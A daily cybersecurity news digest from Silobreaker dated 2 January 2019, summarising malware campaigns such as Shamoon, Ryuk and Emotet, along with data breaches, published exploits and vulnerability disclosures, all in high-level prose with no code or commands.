Silobreaker Daily Cyber Digest – 2 January 2019
New Shamoon sample signed with Baidu certificate
- A new sample of Shamoon disk wiping malware was recently uploaded to VirusTotal from France attempting to pass as a system optimisation tool from Chinese technology company Baidu. The new sample is signed with an old Baidu certificate that is no longer valid.
- Shamoon has previously been observed targeting oil and gas companies in the Middle East region. The attackers behind the latest campaign have also targeted this area, as well as Europe, using the malware to delete files on infected systems and make machines unbootable.
- The malware uses superficial obfuscation tactics such as creating the internal file name as ‘Baidu PC Faster’ and using ‘Baidu WiFi Hotspot Setup’ in its description. Researchers assess that this version was created using the second version of codebase, due to its similarities with Shamoon v2.
Fileless ransomware an emerging threat for US businesses
- A new report by Malwarebytes Labs details the growing risk of fileless ransomware attacks against organizations in the US. Specifically, the report examines SOREBRECT, which has been described as ‘the first of its kind’ due to it combining traditional ransom functionality with fileless tactics. Other fileless attacks that were analysed include Trickbot, EMOTET and SamSam.
Ryuk ransomware disrupts printing and delivering of major US newspapers
- Newspapers affected by the attack include the Wall Street Journal, New York Times, Los Angeles Times, Chicago Tribune and more. An analysis of Ryuk ransomware by Check Point showed code similarities with Hermes ransomware, which has been previously associated with North Korean hacking group Lazarus.
- A statement from the Los Angeles Times published an article stating that the outage was due to ‘a malware attack, which appears to have originated from outside the United States and hobbled computer systems and delayed weekend deliveries.’
American Express phishing emails contain HTML phishing form attachment
- A new phishing campaign has been observed using emails purportedly from American Express, stating that there is an issue with target’s credit card. The recipient is prompted to open an attached HTML phishing form that sends the inputter information back to the attackers. Several variants of this email have been sent since October 2018.
- The campaign uses mail domains based on the keywords ‘American Express’, and include subjects such as ‘Notice Concerning your CardMember Account’.
JungleSec ransomware infects targets through IPMI remote consoles
- Since November, several Linux, Mac and Windows users have been infected with JungleSec ransomware through their unsecured Intelligent Platform Management Interface (IPMI) systems.
- The ransomware was installed through the IPMI systems and once the user gained access to the servers the attackers rebooted the computer into single user mode to gain access, after which they were able to download and compile the ccrypt encryption program. Once ccrypt was downloaded the attackers manually executed it to encrypt the victim’s files.
- A message is then displayed asking the victim to read a file named ENCRYPTED[.]md[.]file, which contained a ransom note with contact information asking for .3 bitcoins to be send to the enclosed bitcoin address.
New BMW lottery email scam
- Emails stating that the recipient has won a free 2018 BMW 2 Series M24oi are circulating in an attempt to gather victim’s personal information. The scam emails have the subject lines ‘Claim Your Car and Check With your Winning Code’.
- Victim’s are told that in order to claim the prize they must send in their full name, address and mobile number. Attackers reportedly often follow up a reply with a request for further sensitive information such as social security numbers.
ESET security publish analysis of the latest Emotet campaign
- The campaign was recently observed targeting South America with email messages purportedly containing information about the dispatch of goods in an attempt to propagate Emotet. The email contains an attachment in PDF format posing as an invoice which, when clicked upon, asks the recipient to enable macros.
- ESET’s report includes a complete technical analysis of the embedded file.
‘Roma225’ Campaign targets Italian automotive companies
- Cybaze Yoroi ZLab researchers report that the malware was spread via a convincing phishing email that attempted to impersonate a senior partner of the Brazilian business law firm Veirano Advogados. The email contains a PowerPoint document that included an auto-open VBA macro code.
- The file’s final payload is RevengeRAT which, once executed, contacts its C&C server to send information from the victim’s machine.
Hackers abuse Google Cloud Storage to host malicious payloads
- Menlo Labs researchers discovered a malicious email campaign targeting employees of US and UK banks and financial services companies, using Google Cloud Storage to deliver malicious payloads. This method enables the attackers to bypass security controls.
- The payloads are hosted on storage.googleapis[.]com and consist of the Houdini and QRat malware families.
Source (Includes IOCs)
Leaks and Breaches
Celebrity twitter account’s tweet streams hacked by spoofing phone numbers
- Twitter allows the option to tweet as long as it is done from the phone number connected to that profile. Insinia Security’s chief executive Mike Godfrey stated that spoofing someone’s number is enough to gain permission to post on their Twitter account.
- Twitter provides a text message service that enables a user to send commands to follow users, tweet, enable and disable notifications and send direct messages. Twitter has no way of validating the sender so will enact the commands according to the number linked to the user’s account.
- Using the method, Insinia was able to publish a message stating, ‘this account has been temporarily hijacked by INSINIA SECURITY’. The accounts of Simon Calder, Eamonn Holmes and Louis Theroux showed these unauthorised messages.
Nova Entertainment warns of data breach affecting over 261,000 Australian citizens
- The exposed information, collected between 2009 and 2011, includes hashed usernames and passwords, emails, residential addresses, phone numbers, genders and birthdates. In total, 261,948 people were affected by the breach.
- According to Nova’s official statement, no financial information or copies of IDs were disclosed.
Dental Center of Northwest Ohio suffers data breach exposing patients’ personal information
- According to Dental Center’s statement the IT vendor, Arakyta, was affected by ransomware that led to the disruption of systems storing Dental Center’s information. The Center did not disclose the number of patients affected.
- The breached data includes names, addresses, birthdates, Social Security numbers, state identification numbers, driver’s license numbers,health insurance and benefit information, financial account information, and more.
The Dark Overlord threatened to leak insurance files relating to 9/11 attacks
- The Dark Overlord announced on Pastebin that they had breached a law firm that handled cases related to the September 11 attacks and threatened to publicly release the documents unless ransom was paid. The Group tweeted, ‘we’ll be providing many answers about 9.11 conspiracies through our 18.000 secret documents leak.’
- The group claimed that they had hacked insurers and legal firms including Hiscox Syndicates Ltd, Lloyds of London and Silverstein Properties.
BBC formally complains to Russia following leak of employees’ personal data
- A formal complaint was issued to Russia’s Ministry of Foreign Affairs regarding an incident in which 44 journalists’ full names and photographs were published on social media by the ‘For Mother Russia’ group on December 25th, 2018. The information was also published on Russian websites pikabu[.]ru and segodnya[.]ru.
Victorian Government suffers data breach affecting 30,000 employees
- The Government of Victoria, Australia, suffered a breach in which employees’ work emails, job titles, work phone numbers and possibly mobile phone numbers, were compromised. No banking or financial information was affected.
Approximately 1000 North Korean defector’s details leaked
- The details were leaked as a result of a hack, which could leave the defectors exposed to severe threats from the regime. The details of the defectors, who are now living in South Korea, were stolen after hackers broke into an archive maintained at a centre that helps North Korean defectors settle in South Korea.
- The attackers carried out a spear phishing attack against employees at the Hanna Centre, which infected a staff member’s computer with malware.
Over 14,000 Bevmo customers impacted in payment card breach
- Attackers used a software skimmer that allowed them to capture customer information from orders placed between August 2nd and September 26th, 2018. Stolen data includes names, phone numbers, addresses, credit and debit card details, and security codes.
Users lose Bitcoin after hacker targets Electrum wallets
- A hacker or hacker group has made over 200 Bitcoin, the equivalent of approximately $750,000, by adding several malicious servers to the Electrum wallet network.
- When legitimate users of Electrum wallets initiate a Bitcoin transaction, if it reaches one of the malicious servers, the servers reply with an error message that urges the users to download a wallet app update from a malicious website.
- If the malicious update is downloaded the app will ask for a 2FA code, which is then used by the malicious wallet to steal the user’s funds and transfer them to the attacker’s Bitcoin address.
Windows Zero-day bug with published PoC code overwrites files with arbitrary data
- A Proof of Concept (PoC) code, published by a researcher using the online alias SandboxEscaper, overwrites ‘pci[.]sys’ with information about software and hardware problems collected through the Windows Error Reporting (WER) event-based feedback infrastructure.
- The PoC does not work on machines with one CPU and reportedly relies upon a race condition and is dependent upon other operations that may break the outcome.
- The exploit is the second published by SandboxEscaper for a zero-day bug in Windows this month.
Exploit code published for remote code execution via Microsoft Edge
- The exploit code demonstrates a memory corruption bug in Microsoft’s Edge Web browser that can lead to remote code execution on unpatched machines, and result in an out-of-bounds (OOB) memory read leak.
Critical vulnerability discovered in Guardzilla IoT camera
- CVE-2018-5560 is a flaw in the design and implementation of Amazon Simple Storage Service (S3) credentials inside the Guardzilla Security Camera firmware. Once the password is known, any unauthenticated used can collect the data from any affected system over the internet.
Researchers discover cryptocurrency wallets Trezor and Ledger are vulnerable to several attacks
- A team of researchers demonstrated how wallets including Trezor One, Ledger Nano S, and Ledger Blue were vulnerable to firmware, side channel, microcontrollers and supply-chain attacks. Their findings were presented during the 35c3 conference in Leipzig, Germany.
Three vulnerabilities found in Schneider Electric vehicle charging stations
- The first bug tracked as CVE-2018-7800, is a hard-coded credentials vulnerability that could be exploited to gain access to the device. The second, tracked as CVE-2018-7801, is a code injection vulnerability that could permit access with maximum privileges when remote code execution is performed. The third flaw, tracked as CVE-2018-7802, is a SQL injection vulnerability that could allow access to the web interface with full privileges.
- The bugs affect Schneider Electric EVLink Parking products v3.2.0-12_v1 and earlier. They were discovered by researchers at Positive Technologies. Schneider has since released an update addressing the flaws.
Facebook accused of tracking non-users via Android apps
- According to a report by Privacy International there are a number of applications including Kayak, Yelp and Shazam, that send tracking and personal information back to Facebook. They state that ‘Facebook routinely tracks users, non-users and logged-out users outside its platform through Facebook Business Tools.’
- The researchers used a free software tool named ‘mitmproxy’ to analyse the data that the apps transmit back to Facebook. In an analysis of 34 Android apps it was discovered that 61% transferred data to Facebook the moment a user opened the app.
- Information shared includes data on the device being used, the language, time zone settings and other sensitive data.
Researcher demonstrates how hacked voicemail systems permit account takeover
- Security expert Martin Vigo found that voicemail systems are vulnerable to compromise through brute-force attacks against the four-digit personal identification numbers (PINs) that are used to protect them. By hacking into a user’s voicemail system, an attacker can then take over online accounts for services such as WhatsApp, PayPal, LinkedIn or Netflix.
Thousands of devices remain infected with WannaCry
- Kryptos Logic researchers analysed WannaCry ransomware’s kill switch domain and found that over 630,000 unique IP addresses from 194 different countries have connected to the domain in just one week. This indicates that hundreds of thousands of devices worldwide remain infected with the ransomware.
- The main countries that remain infected are China, Indonesia and Vietnam.
Iran’s resistance movement claims Iranian regime is waging cyber warfare against citizens
- The Express reported that Iran’s Islamic Revolutionary Guard Corps (IRGC) and Ministry of Intelligence and Security (MOIS) are implementing ‘cyber warfare to preserve theocracy’. The claim is based on a report by the official Iranian resistance movement, the National Council of Resistance of Iran (NCRI) that was shared with the tabloid.
- According to NCRI, the regime is routing internet traffic through state-controlled systems preventing individuals from evading state-sponsored ‘cyber repression’. Furthermore, NCRI claims that Iran’s government is using mobile malware and spyware to monitor Iranian citizens. The malware is distributed via smartphone apps through Iran’s Android marketplace ‘Café Bazaar’.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.